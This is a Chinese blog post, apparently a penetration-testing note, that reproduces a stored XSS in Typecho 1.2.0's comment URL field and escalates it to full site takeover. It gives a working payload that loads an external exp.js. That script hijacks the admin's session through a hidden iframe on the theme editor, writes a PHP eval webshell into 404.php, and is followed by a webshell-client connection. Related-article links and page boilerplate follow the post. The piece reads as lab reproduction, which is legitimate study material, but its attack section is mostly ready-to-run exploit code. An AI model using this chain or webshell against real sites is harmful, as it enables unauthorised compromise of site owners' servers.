typecho:XSS+CSRF打一套组合拳拿下目标站点

最新推荐文章于 2024-11-09 23:29:09 发布
最新推荐文章于 2024-11-09 23:29:09 发布
阅读量435 收藏 3
点赞数 15
分类专栏: 渗透测试笔记 文章标签: xss csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/140750162
版权

目录

漏洞描述

环境搭建

漏洞复现

登录后台

构造恶意的 JS

蚁剑连接

漏洞描述

Typecho 的github项目仓库留言处有人爆出评论功能的网址填空出现储存型xss漏洞,不少人已经被攻击,目前 Typecho 暂未发布修复该漏洞的教程,但是 Typecho 的 Github 仓库的最新代码已修复该漏洞,并预发布了 Typecho 1.2.1-rc 版本。

环境搭建

首先去GitHub 下载 源码

https://github.com/typecho/typecho/releases/tag/v1.2.0

选择php7以上的环境进行搭建即可

漏洞复现

点击右上角网站

先正常提交一次评论

然后尝试闭合并且构造xss的攻击代码

https://www.baidu.com/"/><seript>alert(1)</seript><

发现并没有对xss的代码进行过滤,每次刷新都有这个xss弹窗出现

登录后台

后台处理评论的时候,发现弹窗存在

后台既然可以触发,可以尝试构造恶意的js,对web的页面进行修改

构造恶意的 JS

把下面的脚本写入一个文本,重命名为 exp.js,放在小皮(phpstudy)的根目录

function step1(){
     var data2="<iframe id=\"testxss\" src=\"/typecho/admin/theme-editor.php?theme=default&file=404.php\" width=\"0%\" height=\"0%\" onload=\"poc()\"></iframe>";
     var oldata=document.body.innerHTML;
     document.body.innerHTML=(oldata+data2);}
     
 var times=0;
 var g_shell=0;
 function poc(){
     if(times<=10){
         var htmldata=document.getElementById('testxss').contentWindow.document.getElementById('content');
         var btn=document.getElementById('testxss').contentWindow.document.getElementsByTagName('button');
         htmldata.innerText=('<?php eval($_POST[\'cmd\']);');
         btn[1].click();
         //攻击完毕
         times+=1;
         if(g_shell==1){
             var xhr1=new XMLHttpRequest();
             xhr1.open('get','/usr/themes/default/404.php?cmd=1');
             xhr1.send();
             }
         else{
             return 0;
         }
     }
 }
 step1();

payload:

https://www.baidu.com/"/><script/src=//127.0.0.1/exp.js></script><div/"

去后台触发一下

再去看看404.php

发现写入成功

蚁剑连接

连接成功,至此站点成功拿下

Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2
05-19
Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2Typecho博客+Joe主题+插件 typecho 编辑器插件 1.3.2...
Typecho1.2 - 1.2.1-rc前台评论存储xss到rce 漏洞复现-分析-修复
君逍遥o
09-08 486
Typecho1.2 - 1.2.1-rc前台评论存储xss到rce 漏洞复现-分析-修复
Typecho框架漏洞
weixin_62693307的博客
11-19 526
这里说的漏洞xss漏洞,学过渗透的应该都学过,我在这里就不过多阐述了,下面我们直接进入正题。然后再次访问时即可弹出一个框,这里学过xss漏洞的应该知道是什么意思了。这里说的框架漏洞只适用于1.2.0版本及以下的版本。然后等管理员访问评论是会使得js文件也给运行起来。然后这里就像上面反弹xss代码一样书写网址。生成的一句话目录路径可以自己改,上面的如下。在404.php中,这样路径的问题就解决了。这样我们就可以用蚁剑或其他工具连接后台了。
typecho存储型xss漏洞复现
m0_73299839的博客
07-26 457
之前搭博客的时候使用的是typecho,然后有看到文章说typecho
漏洞复现篇——Typecho反序列化漏洞
爱国小白帽
03-03 5244
实验环境: PHPstudy 火狐浏览器 Typecho 填好数据库密码和你的登录密码就可以了 安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库 ...
Typecho博客+Joe主题+插件 投稿插件
05-19
Typecho博客+Joe主题+插件 投稿插件Typecho博客+Joe主题+插件 投稿插件Typecho博客+Joe主题+插件 投稿插件Typecho博客+Joe主题+插件 投稿插件Typecho博客+Joe主题+插件 投稿插件Typecho博客+Joe主题+插件 投稿插件...
Typecho博客+Joe主题+插件 文章打赏插件
05-19
Typecho博客+Joe主题+插件 文章打赏插件Typecho博客+Joe主题+插件 文章打赏插件Typecho博客+Joe主题+插件 文章打赏插件Typecho博客+Joe主题+插件 文章打赏插件Typecho博客+Joe主题+插件 文章打赏插件Typecho博客+Joe...
Typecho博客+Joe主题+插件 Joe 7.3.2
05-19
Typecho博客+Joe主题+插件 Joe 7.3.2Typecho博客+Joe主题+插件 Joe 7.3.2Typecho博客+Joe主题+插件 Joe 7.3.2Typecho博客+Joe主题+插件 Joe 7.3.2Typecho博客+Joe主题+插件 Joe 7.3.2Typecho博客+Joe主题+插件 Joe ...
Typecho博客+Joe主题+插件 Joe 7.3.3
05-19
Typecho博客+Joe主题+插件 Joe 7.3.3Typecho博客+Joe主题+插件 Joe 7.3.3Typecho博客+Joe主题+插件 Joe 7.3.3Typecho博客+Joe主题+插件 Joe 7.3.3Typecho博客+Joe主题+插件 Joe 7.3.3Typecho博客+Joe主题+插件 Joe ...
分析、还原一次typecho入侵事件
hl1293348082的专栏
05-30 300
基友szrzvdny的朋友博客被入侵了,由于是虚拟空间,所以只有 apache 访问日志以供分析 这里的日志已经做去敏操作了,以供学习: https://pan.baidu.com/s/1JUII7_ZOK1SIxnWxlzu0Hw密码: bykr 整个事情发生的挺突然的,我也是第一次搞这种溯源、应急响应的东西~一想到说不定就拿到了typecho的 0day,其实还是很激动的。 首先分析日志,Linux 可以用 grep 我:Windows、Notepad++ 首先直接查找木马文件...
【Pikachu靶场:XSS系列】xss之过滤,xss之htmlspecialchars,xss之herf输出,xss之js输出通关啦
m0_47484034的博客
11-05 461
【Pikachu靶场:XSS系列】xss之过滤,xss之htmlspecialchars,xss之herf输出,xss之js输出通关啦
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
m0_47484034的博客
11-05 309
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
ctfshow(316,317,318)--XSS漏洞--反射性XSS
m0_56019217的博客
11-06 576
当前页面的cookie是flag=you%20are%20not%20admin%20no%20flag。但是这里我使用XSS平台,显示的cookie还是这样,并不能得到flag。首先想到利用XSS平台解题,看其他师傅的wp提示flag是在cookie中。于是我们使用稳定性更高的方法:写js代码将cookie传到自己的服务器上。查看自己服务器中的cookie.txt文件,得到flag。显示是关于反射性XSS的题目。提交之后成功跳转到自己的网页。
【前端】JavaScript 方法速查大全-函数、正则、格式化、转换、进制、 XSS 转义(四)
万物皆有灵
11-06 573
在现代前端开发中,JavaScript 是不可或缺的语言。无论是处理数据、操作 DOM,还是进行复杂的逻辑运算,掌握 JavaScript 的各种方法都是每位开发者的必修课。本文将为您提供一个全面、系统的 JavaScript 方法参考,涵盖数组操作、对象处理、正则表达式、数据格式转换等众多方面,助您在开发中游刃有余!💪。
ctfshow(319->326)--XSS漏洞--反射型XSS
m0_56019217的博客
11-08 569
先测试过滤,发现过滤了script、img,没有过滤body,svg得到flag.
XSS详解
QQ_778132974的博客
11-08 418
总之,XSS攻击是一种严重的安全威胁,但通过采取适当的防御措施,可以有效地降低其风险。XSS,全称是跨站脚本攻击(Cross-site scripting,简称:XSS),是一种网站应用程序的安全漏洞攻击,是代码注入的一种。攻击者可以利用XSS漏洞旁路同源策略(SOP)的安全限制,从而执行一些恶意的操作,比如窃取用户的Cookie、会话令牌,或者对受害者进行重定向等。为了防止XSS攻击,可以采取以下措施:输入验证和转义:对所有用户输入进行严格的验证和转义,以防止恶意脚本的注入。
ctfshow(328)--XSS漏洞--存储型XSS
最新发布
m0_56019217的博客
11-09 258
简单阅读一下页面。是一个登录系统,存在一个用户管理数据库。那么我们注册一个账号,在账号或者密码中植入HTML恶意代码,当管理员访问用户管理数据库页面时,就会触发我们的恶意代码。
xss到任意文件读取
若有战,召必回
11-05 1182
xss一直是一种非常常见且具有威胁性的攻击方式。然而,除了可能导致用户受到恶意脚本的攻击外,xss在特定条件下还会造成ssrf和文件读取,本文主要讲述在一次漏洞挖掘过程中从xss到文件读取的过程,以及其造成的成因。0x01 前言xss一直是一种非常常见且具有威胁性的攻击方式。然而,除了可能导致用户受到恶意脚本的攻击外,xss在特定条件下还会造成ssrf和文件读取,本文主要讲述在一次漏洞挖掘过程中从xss到文件读取的过程,以及其造成的成因。0x02 漏洞详细XSS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值